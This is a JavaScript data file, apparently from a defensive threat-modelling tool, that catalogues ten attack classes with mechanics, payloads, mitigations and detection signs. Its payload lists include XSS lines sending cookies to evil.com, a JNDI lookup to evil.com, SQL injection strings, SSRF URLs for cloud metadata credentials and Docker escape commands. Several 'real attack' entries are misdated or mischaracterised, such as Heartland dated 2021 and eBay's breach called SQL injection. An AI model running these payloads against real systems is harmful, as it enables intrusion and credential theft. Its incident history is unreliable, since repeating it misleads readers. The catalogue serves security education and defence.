export const THREAT_CATALOG = [
  {
    id: "thr-001",
    name: "SQL Injection",
    category: "Injection",
    attackVector: "Network",
    cvss: 9.8,
    severity: "critical",
    likelihood: "high",
    impact: "critical",
    description:
      "Attacker inserts malicious SQL syntax into user-controlled input fields. The database interprets this as legitimate commands, allowing data extraction, modification, or authentication bypass.",
    howItWorks: [
      "Attacker identifies user-controlled input that flows into a SQL query",
      "Injects SQL metacharacters (', --, ;, OR, UNION) to alter query logic",
      "Extracts data using UNION SELECT or blind techniques (time-based, boolean)",
      "Escalates to OS command execution via xp_cmdshell (MSSQL) or INTO OUTFILE (MySQL)",
    ],
    realAttacks: [
      { year: 2021, incident: "Heartland Payment Systems — 130M card numbers stolen via SQL injection in batch processing system", damage: "$145M settlement" },
      { year: 2020, incident: "UK National Lottery (Camelot) — player accounts accessed via SQLi in login form", damage: "26,500 accounts compromised" },
      { year: 2014, incident: "eBay breach — SQL injection used to extract 145M encrypted passwords", damage: "Mandatory password reset for all users" },
    ],
    payloads: [
      "' OR '1'='1' --        (auth bypass)",
      "'; DROP TABLE users --  (destructive)",
      "' UNION SELECT username,password FROM users --  (data extraction)",
      "' AND 1=CONVERT(int, (SELECT TOP 1 name FROM sysobjects)) --  (blind)",
    ],
    mitigations: [
      { control: "Use parameterized queries / prepared statements", priority: "critical", effort: "low" },
      { control: "Apply input validation with allowlist (type, length, charset)", priority: "critical", effort: "low" },
      { control: "Use ORM with built-in parameterization (Sequelize, Prisma, SQLAlchemy)", priority: "high", effort: "medium" },
      { control: "Enforce least privilege on database accounts (no DROP, CREATE, xp_cmdshell)", priority: "high", effort: "low" },
      { control: "Deploy WAF with SQLi ruleset (ModSecurity CRS)", priority: "medium", effort: "medium" },
      { control: "Run SAST (SonarQube, Checkmarx) to detect concatenation patterns in code", priority: "high", effort: "medium" },
    ],
    detectionSigns: [
      "Unusual DB error messages in app responses",
      "Slow queries with time-based payloads",
      "Unexpected data returned in responses",
      "WAF alerts on SQL metacharacters",
    ],
    affectedPhases: ["development", "testing"],
    tags: ["OWASP A03", "CWE-89", "PCI DSS Req 6.3"],
  },
  {
    id: "thr-002",
    name: "Cross-Site Scripting (XSS)",
    category: "Injection",
    attackVector: "Network",
    cvss: 9.3,
    severity: "critical",
    likelihood: "high",
    impact: "high",
    description:
      "Attacker injects malicious scripts into web pages viewed by victims. Scripts execute in the victim's browser with full access to session cookies, local storage, and page content.",
    howItWorks: [
      "Attacker finds an input reflected or stored in HTML without encoding",
      "Injects JavaScript payload (alert(), fetch(), document.cookie access)",
      "Victim's browser executes the script in the context of the legitimate domain",
      "Script exfiltrates cookies, performs actions as victim, or loads additional payloads",
    ],
    realAttacks: [
      { year: 2018, incident: "British Airways Magecart attack — stored XSS injected card-skimming script on payment page", damage: "500,000 cards stolen, £183M GDPR fine" },
      { year: 2021, incident: "Microsoft Teams stored XSS — attacker could send a message that silently installed malware on recipient's machine", damage: "Remote code execution via chat" },
      { year: 2020, incident: "TikTok reflected XSS in email link — one-click account takeover with cookie theft", damage: "Potential access to 1B accounts" },
    ],
    payloads: [
      "<script>document.location='https://evil.com/?c='+document.cookie</script>",
      "<img src=x onerror=\"fetch('https://evil.com/?'+btoa(document.cookie))\">",
      "<svg onload=\"eval(atob('base64payload'))\">",
      "javascript:alert(document.domain)  (in href attributes)",
    ],
    mitigations: [
      { control: "Output encode all user-controlled data in HTML context (use trusted templating engines)", priority: "critical", effort: "low" },
      { control: "Implement strict Content Security Policy (CSP) with nonces", priority: "critical", effort: "medium" },
      { control: "Sanitize HTML with DOMPurify when rich text is necessary", priority: "high", effort: "low" },
      { control: "Set HttpOnly flag on session cookies (prevents cookie theft via JS)", priority: "critical", effort: "low" },
      { control: "Use React/Vue/Angular (auto-escape output) — avoid dangerouslySetInnerHTML", priority: "high", effort: "low" },
      { control: "Implement X-XSS-Protection header and CSP report-uri for monitoring", priority: "medium", effort: "low" },
    ],
    detectionSigns: [
      "CSP violation reports",
      "Unexpected script tags in stored content",
      "Users reporting being redirected",
      "SIEM alerts on known XSS patterns in request logs",
    ],
    affectedPhases: ["development", "testing"],
    tags: ["OWASP A03", "CWE-79", "HIPAA"],
  },
  {
    id: "thr-003",
    name: "Broken Authentication & Session Hijacking",
    category: "Authentication",
    attackVector: "Network",
    cvss: 9.1,
    severity: "critical",
    likelihood: "high",
    impact: "critical",
    description:
      "Weaknesses in authentication mechanisms allow attackers to assume other users' identities. Includes credential stuffing, session token theft, weak password policies, and missing MFA.",
    howItWorks: [
      "Attacker obtains credentials via phishing, data breach, or brute force",
      "Credential stuffing — tests leaked username/password pairs from other breaches",
      "Session token stolen via XSS, insecure transport, or network sniffing",
      "Forged authentication token (weak JWT signing, predictable session IDs)",
    ],
    realAttacks: [
      { year: 2022, incident: "Okta support tool breach — credential stuffing + no MFA = access to 366 customer organizations", damage: "Major reputational damage, stock dropped 9%" },
      { year: 2020, incident: "Twitter VIP account hijacking — internal admin tool accessed, used to compromise Obama, Biden, Musk accounts", damage: "$120K Bitcoin scam, major trust damage" },
      { year: 2021, incident: "Colonial Pipeline — single compromised VPN password (no MFA) led to ransomware shutdown of US fuel supply", damage: "$4.4M ransom paid, national emergency declared" },
    ],
    payloads: [
      "Credential stuffing tools: Sentry MBA, OpenBullet, SNIPR",
      "Session fixation: set session ID before auth, reuse after",
      "JWT 'alg:none' bypass: remove signature verification",
      "Predictable session IDs: increment or timestamp-based tokens",
    ],
    mitigations: [
      { control: "Enforce MFA on all accounts, especially privileged/admin", priority: "critical", effort: "medium" },
      { control: "Rate limit login attempts (5/min per IP, 10 per account)", priority: "critical", effort: "low" },
      { control: "Use cryptographically random session IDs (128+ bits)", priority: "critical", effort: "low" },
      { control: "Rotate session tokens after authentication (session fixation prevention)", priority: "high", effort: "low" },
      { control: "Monitor for impossible travel, concurrent sessions, anomalous geolocation", priority: "high", effort: "high" },
      { control: "Integrate with HaveIBeenPwned API to block known-breached passwords", priority: "medium", effort: "low" },
    ],
    detectionSigns: [
      "High rate of failed login attempts from single IP",
      "Successful logins from unusual geolocation",
      "Multiple concurrent sessions for same user",
      "Login attempts with credentials matching known breach dumps",
    ],
    affectedPhases: ["design", "development", "testing", "operations"],
    tags: ["OWASP A07", "CWE-287", "NIST 800-63"],
  },
  {
    id: "thr-004",
    name: "Insecure Direct Object Reference (IDOR)",
    category: "Access Control",
    attackVector: "Network",
    cvss: 9.1,
    severity: "critical",
    likelihood: "high",
    impact: "high",
    description:
      "Application exposes internal implementation objects (database IDs, file paths) without verifying that the authenticated user has permission to access the specific resource.",
    howItWorks: [
      "Attacker authenticates as a legitimate user",
      "Identifies a URL/parameter containing a resource identifier (userId=123, orderId=456)",
      "Modifies the identifier to reference another user's resource",
      "Application returns data without checking ownership → full data exposure",
    ],
    realAttacks: [
      { year: 2019, incident: "Instagram — change user_id in download-data API to get any user's photos, DMs, and stories", damage: "Millions of accounts potentially exposed" },
      { year: 2021, incident: "Parler — sequential integer IDs on all posts allowed bulk download of all 70TB of content before shutdown", damage: "All user data downloaded and published" },
      { year: 2020, incident: "US DoD contractor — IDOR in employee portal exposed W-2 tax forms by changing employee ID in URL", damage: "Thousands of employees' financial data exposed" },
    ],
    payloads: [
      "GET /api/users/1234/profile  → change to /api/users/1235/profile",
      "GET /invoices/download?id=abc123  → enumerate IDs",
      "POST /orders/update  { 'orderId': '12345' }  → change to another user's order",
      "GET /files/document.pdf?userId=me  → change userId parameter",
    ],
    mitigations: [
      { control: "Always scope database queries to authenticated user's ID", priority: "critical", effort: "low" },
      { control: "Use UUIDs instead of sequential integer IDs (harder to enumerate)", priority: "high", effort: "low" },
      { control: "Implement explicit authorization checks for every resource access", priority: "critical", effort: "medium" },
      { control: "Return 404 (not 403) when access is denied (prevent enumeration)", priority: "medium", effort: "low" },
      { control: "Use Burp Suite Autorize extension in security testing to catch IDORs", priority: "high", effort: "low" },
      { control: "Log all resource access with user IDs for audit trail", priority: "high", effort: "low" },
    ],
    detectionSigns: [
      "Requests for resources belonging to other users",
      "Sequential or predictable IDs in access logs",
      "Access to resources from unusual users",
    ],
    affectedPhases: ["design", "development", "testing"],
    tags: ["OWASP A01", "CWE-639", "Bug Bounty #1"],
  },
  {
    id: "thr-005",
    name: "Sensitive Data Exposure in Logs",
    category: "Data Exposure",
    attackVector: "Local",
    cvss: 7.5,
    severity: "high",
    likelihood: "medium",
    impact: "high",
    description:
      "Application logs contain passwords, session tokens, PII, credit card numbers, or API keys. Log files are often stored unencrypted, widely accessible, and retained for years.",
    howItWorks: [
      "Developer adds debug logging that includes request body or headers",
      "Error handlers log full stack traces with user data",
      "Logs are stored unencrypted on disk or shipped to a centralized logging service",
      "Attacker gains access to log storage (via misconfiguration, insider, or breach)",
    ],
    realAttacks: [
      { year: 2019, incident: "Twitter — passwords stored in plaintext in internal logs due to bug in password masking. 330M users affected.", damage: "330M users advised to change passwords" },
      { year: 2019, incident: "Facebook — hundreds of millions of Instagram passwords stored in plaintext in internal data store, readable by 20,000+ employees", damage: "Massive GDPR investigation" },
      { year: 2021, incident: "GitHub — authentication tokens logged in internal logs for Actions customers", damage: "Tokens invalidated, affected customers notified" },
    ],
    payloads: [
      "Log file exposed in web root: /var/log/app/app.log",
      "Kibana dashboard with no auth (common misconfiguration)",
      "S3 bucket with logs set to public read",
      "Debug endpoint returning full request logs",
    ],
    mitigations: [
      { control: "Implement centralized log redaction — mask passwords, tokens, cards, SSNs", priority: "critical", effort: "medium" },
      { control: "Never log Authorization headers, cookies, or request bodies by default", priority: "critical", effort: "low" },
      { control: "Encrypt log storage at rest and in transit", priority: "high", effort: "medium" },
      { control: "Restrict log access — least privilege, no public cloud storage", priority: "high", effort: "low" },
      { control: "Implement log retention policy — delete after 90 days unless required by compliance", priority: "medium", effort: "low" },
      { control: "Run automated secret scanning over log outputs in CI (GitLeaks)", priority: "high", effort: "medium" },
    ],
    detectionSigns: [
      "Secret scanners finding tokens in log files",
      "Unusual log file access by non-ops users",
      "Alert on log file downloads from log storage",
    ],
    affectedPhases: ["development", "operations"],
    tags: ["OWASP A09", "CWE-532", "GDPR Art.32"],
  },
  {
    id: "thr-006",
    name: "Server-Side Request Forgery (SSRF)",
    category: "SSRF",
    attackVector: "Network",
    cvss: 8.6,
    severity: "high",
    likelihood: "medium",
    impact: "critical",
    description:
      "Attacker tricks the server into making HTTP requests to internal or external targets. Commonly used to access cloud metadata services, scan internal networks, or pivot to internal services.",
    howItWorks: [
      "Application fetches a URL provided by the user (webhook, preview, import)",
      "Attacker provides internal URL: http://169.254.169.254/latest/meta-data/ (AWS IMDSv1)",
      "Server fetches the internal endpoint and returns the response",
      "Attacker extracts IAM credentials, then accesses S3, RDS, EC2 using those credentials",
    ],
    realAttacks: [
      { year: 2019, incident: "Capital One — SSRF via misconfigured WAF gave access to AWS IMDSv1. IAM creds used to download 100M customer records from S3", damage: "$80M fine, 100M customers exposed" },
      { year: 2021, incident: "GitLab SSRF — requests to internal GitLab services via user-supplied URL in webhook configuration", damage: "Internal service access, code scanning bypass" },
      { year: 2022, incident: "Mail.ru SSRF — webhook feature fetched internal Redis, exposing cache contents including session data", damage: "Session token theft at scale" },
    ],
    payloads: [
      "http://169.254.169.254/latest/meta-data/iam/security-credentials/ (AWS)",
      "http://metadata.google.internal/computeMetadata/v1/ (GCP)",
      "http://169.254.169.254/metadata?api-version=2021-01-01 (Azure)",
      "http://localhost:6379/ (Redis), http://localhost:9200/ (Elasticsearch)",
      "file:///etc/passwd, dict://localhost:11211/ (Memcached)",
    ],
    mitigations: [
      { control: "Use URL allowlist — only permit specific approved domains/IPs", priority: "critical", effort: "medium" },
      { control: "Block private IP ranges (10.0.0.0/8, 172.16.0.0/12, 169.254.0.0/16) in outbound requests", priority: "critical", effort: "medium" },
      { control: "Migrate to IMDSv2 (AWS) — requires PUT token exchange, blocks simple SSRF", priority: "critical", effort: "low" },
      { control: "Disable URL redirects in HTTP client (maxRedirects: 0)", priority: "high", effort: "low" },
      { control: "Set network-level egress controls — application servers cannot reach metadata endpoints", priority: "high", effort: "high" },
      { control: "Log and alert on internal IP access attempts", priority: "medium", effort: "low" },
    ],
    detectionSigns: [
      "Requests to 169.254.x.x in access logs",
      "Requests to RFC1918 addresses from application servers",
      "Unexpected metadata API calls in CloudTrail",
    ],
    affectedPhases: ["design", "development", "testing"],
    tags: ["OWASP A10", "CWE-918", "Capital One"],
  },
  {
    id: "thr-007",
    name: "Supply Chain / Dependency Compromise",
    category: "Supply Chain",
    attackVector: "Network",
    cvss: 9.8,
    severity: "critical",
    likelihood: "medium",
    impact: "critical",
    description:
      "Attacker compromises a third-party dependency, build tool, or CI/CD system to inject malicious code into software. Extremely high impact as malicious code runs with full application trust.",
    howItWorks: [
      "Attacker publishes malicious npm/PyPI/Maven package (typosquatting or account takeover)",
      "Developer installs the package or it's pulled in as a transitive dependency",
      "Malicious code executes during build, install, or runtime — exfiltrating secrets, installing backdoors",
      "Or: attacker compromises CI/CD pipeline to modify build artifacts",
    ],
    realAttacks: [
      { year: 2021, incident: "SolarWinds — nation-state attackers injected SUNBURST backdoor into Orion software build process. 18,000+ customers affected including US Gov", damage: "18,000 customers, US Treasury, DoD compromised" },
      { year: 2021, incident: "event-stream npm package — attacker gained publish rights, injected code to steal Bitcoin from specific wallet app", damage: "8M weekly downloads affected" },
      { year: 2021, incident: "ua-parser-js npm package hijacked — malicious version published that mined crypto and installed backdoors", damage: "8M weekly downloads, short-lived but wide impact" },
      { year: 2021, incident: "Log4Shell (CVE-2021-44228) — RCE via JNDI injection in Log4j 2.x. Affected virtually every Java application", damage: "CVSS 10.0, millions of servers vulnerable" },
    ],
    payloads: [
      "Typosquatting: 'lodash' vs 'l0dash', 'event-stream' vs 'evnt-stream'",
      "Malicious postinstall script in package.json",
      "Compromised CI token used to replace build artifacts",
      "JNDI injection: ${jndi:ldap://evil.com/a} in log messages",
    ],
    mitigations: [
      { control: "Lock dependency versions with lockfiles (package-lock.json, requirements.txt pinned)", priority: "critical", effort: "low" },
      { control: "Enable automated SCA scanning (Snyk, Dependabot, OWASP Dependency-Check)", priority: "critical", effort: "low" },
      { control: "Verify package integrity with checksums/hashes before installation", priority: "high", effort: "medium" },
      { control: "Use private package registry (Artifactory, Nexus) with approved package allowlist", priority: "high", effort: "high" },
      { control: "Scan CI/CD pipeline configuration for secret exposure and privilege escalation", priority: "high", effort: "medium" },
      { control: "Use SBOM (Software Bill of Materials) to track all dependencies", priority: "medium", effort: "medium" },
      { control: "Sign build artifacts (Sigstore/Cosign) and verify signatures in deployment", priority: "high", effort: "high" },
    ],
    detectionSigns: [
      "New transitive dependencies introduced without code changes",
      "Build script making unexpected network calls",
      "Dependency checksums changed without version bump",
      "CI artifacts larger than expected",
    ],
    affectedPhases: ["development", "deployment"],
    tags: ["OWASP A06", "CWE-1104", "SolarWinds", "Log4Shell"],
  },
  {
    id: "thr-008",
    name: "Secrets Leaked in Source Code / Git History",
    category: "Secrets Exposure",
    attackVector: "Network",
    cvss: 9.8,
    severity: "critical",
    likelihood: "high",
    impact: "critical",
    description:
      "Developers accidentally commit API keys, passwords, certificates, or tokens to version control. Even after removal, secrets remain in git history and can be extracted by attackers.",
    howItWorks: [
      "Developer hard-codes secret for testing, forgets to remove before commit",
      "Secret is pushed to GitHub (public or private repo)",
      "Automated bots (GitGuardian, malicious actors) scan for secrets within seconds of push",
      "Attacker uses the leaked credential to access AWS, database, payment processor, etc.",
    ],
    realAttacks: [
      { year: 2022, incident: "Toyota — AWS keys in public GitHub gave access to customer vehicle tracking data for 296,019 vehicles over 5 years", damage: "296K customers exposed, major brand damage" },
      { year: 2016, incident: "Uber — AWS keys in GitHub commit gave access to S3 with 57M user/driver records. Uber paid $100K to silence the finder", damage: "$148M settlement, CSO fired" },
      { year: 2020, incident: "Mercedes-Benz — GitHub token in public repo gave read access to entire internal GitHub Enterprise instance with proprietary source code", damage: "Entire codebase exposed" },
    ],
    payloads: [
      "API keys: AKIA* (AWS), sk_live_* (Stripe), ghp_* (GitHub)",
      "Private keys: -----BEGIN RSA PRIVATE KEY-----",
      ".env files committed accidentally",
      "Connection strings in config: mongodb+srv://user:pass@cluster/",
    ],
    mitigations: [
      { control: "Pre-commit hook with secret scanning (detect-secrets, GitLeaks)", priority: "critical", effort: "low" },
      { control: "GitHub Advanced Security / GitGuardian for automated scanning on push", priority: "critical", effort: "low" },
      { control: "Never store secrets in .env files committed to repo; use .gitignore", priority: "critical", effort: "low" },
      { control: "If a secret is leaked: rotate immediately, assume compromised", priority: "critical", effort: "low" },
      { control: "Use git-filter-repo to purge secrets from history after a leak", priority: "high", effort: "medium" },
      { control: "Store all secrets in Vault / AWS Secrets Manager / Azure Key Vault", priority: "high", effort: "medium" },
    ],
    detectionSigns: [
      "GitGuardian / GitHub secret scanning alert",
      "Unexpected AWS CloudTrail activity from unknown IP",
      "Stripe webhook events from unknown sources",
    ],
    affectedPhases: ["development", "deployment"],
    tags: ["CWE-798", "OWASP A02", "Toyota 2022", "Uber 2016"],
  },
  {
    id: "thr-009",
    name: "Container / Docker Misconfiguration",
    category: "Infrastructure",
    attackVector: "Network",
    cvss: 8.8,
    severity: "high",
    likelihood: "high",
    impact: "critical",
    description:
      "Misconfigured containers running as root, with excessive privileges, or using vulnerable base images allow attackers to escape containers and compromise the host or cluster.",
    howItWorks: [
      "Container runs as root — vulnerability in app code gives root shell in container",
      "Privileged container or host volume mount allows escape to host filesystem",
      "Container uses outdated base image with known CVEs",
      "Docker daemon socket mounted in container — attacker spins up privileged container to escape",
    ],
    realAttacks: [
      { year: 2019, incident: "Tesla Kubernetes cluster — exposed k8s dashboard (no auth) used to deploy crypto miner in containers", damage: "AWS compute costs, potential data access" },
      { year: 2020, incident: "Docker Hub compromise — 190,000 accounts breached, malicious images published to public registry used by thousands", damage: "Malicious code in production at scale" },
      { year: 2022, incident: "TradeRepublic — misconfigured Kubernetes RBAC allowed service account to list secrets in all namespaces", damage: "All Kubernetes secrets potentially exposed" },
    ],
    payloads: [
      "docker run --privileged --volume /:/host (host escape)",
      "docker run -v /var/run/docker.sock:/var/run/docker.sock (socket escape)",
      "Kubernetes: privilege escalation via hostPID: true, hostNetwork: true",
      "Exposed Docker API: curl http://docker-host:2375/containers/json",
    ],
    mitigations: [
      { control: "Run containers as non-root user (USER 1001 in Dockerfile)", priority: "critical", effort: "low" },
      { control: "Use read-only root filesystem (securityContext.readOnlyRootFilesystem: true)", priority: "high", effort: "low" },
      { control: "Never mount Docker socket or host paths unless absolutely necessary", priority: "critical", effort: "low" },
      { control: "Scan container images with Trivy/Snyk before deployment (block critical CVEs)", priority: "critical", effort: "medium" },
      { control: "Use distroless or minimal base images (gcr.io/distroless)", priority: "high", effort: "medium" },
      { control: "Apply Kubernetes Pod Security Standards (Restricted policy)", priority: "high", effort: "medium" },
      { control: "Enable runtime security with Falco — alert on suspicious container behavior", priority: "high", effort: "high" },
    ],
    detectionSigns: [
      "Container running as UID 0 (root)",
      "Unusual syscalls from containers (Falco alert)",
      "Crypto mining process detected in container",
      "Unexpected external connections from container",
    ],
    affectedPhases: ["deployment", "operations"],
    tags: ["CWE-250", "CIS Docker Benchmark", "K8s Security"],
  },
  {
    id: "thr-010",
    name: "Ransomware via Unpatched Vulnerabilities",
    category: "Vulnerability Management",
    attackVector: "Network",
    cvss: 9.8,
    severity: "critical",
    likelihood: "high",
    impact: "critical",
    description:
      "Attackers exploit known, unpatched vulnerabilities in public-facing services to gain initial access, move laterally, and deploy ransomware across the organization.",
    howItWorks: [
      "Attacker scans internet for services running vulnerable software versions",
      "Exploits published CVE — initial access in minutes from public PoC",
      "Deploys implant/backdoor, performs lateral movement",
      "Exfiltrates data first (double extortion), then encrypts systems",
    ],
    realAttacks: [
      { year: 2021, incident: "Colonial Pipeline — REvil ransomware via compromised VPN credentials. US fuel supply disrupted for 6 days", damage: "$4.4M ransom, national emergency, fuel shortage" },
      { year: 2021, incident: "Kaseya VSA — CVE-2021-30116 (zero-day) exploited to deploy REvil ransomware to 1,500+ MSP customers via single platform", damage: "$70M ransom demand, 1,500 businesses impacted" },
      { year: 2023, incident: "MOVEit Transfer — CVE-2023-34362 SQL injection exploited by Cl0p group, affecting 2,500+ organizations globally", damage: "600M+ individuals' data stolen" },
    ],
    payloads: [
      "Exploitation of unpatched VPN (Pulse Secure, Fortinet, Citrix ADC)",
      "ProxyShell/ProxyLogon — Microsoft Exchange RCE chains",
      "Log4Shell — JNDI injection for initial access",
      "MOVEit SQL injection for data exfiltration",
    ],
    mitigations: [
      { control: "Establish patch SLAs: Critical CVE ≤ 24h, High ≤ 7 days, Medium ≤ 30 days", priority: "critical", effort: "high" },
      { control: "Continuous vulnerability scanning (Tenable, Qualys) on all internet-facing assets", priority: "critical", effort: "medium" },
      { control: "MFA on all remote access (VPN, RDP, SSH) — no exceptions", priority: "critical", effort: "medium" },
      { control: "Network segmentation — limit blast radius if a system is compromised", priority: "high", effort: "high" },
      { control: "Immutable backups in isolated environment — test restoration quarterly", priority: "critical", effort: "medium" },
      { control: "Disable unnecessary services and close unused ports", priority: "high", effort: "low" },
    ],
    detectionSigns: [
      "Exploitation attempt alerts from IDS/WAF",
      "Unusual lateral movement in network logs",
      "Mass file encryption events in EDR",
      "Outbound data exfiltration before encryption",
    ],
    affectedPhases: ["operations"],
    tags: ["CVE Management", "NIST CSF", "CISA KEV"],
  },
];
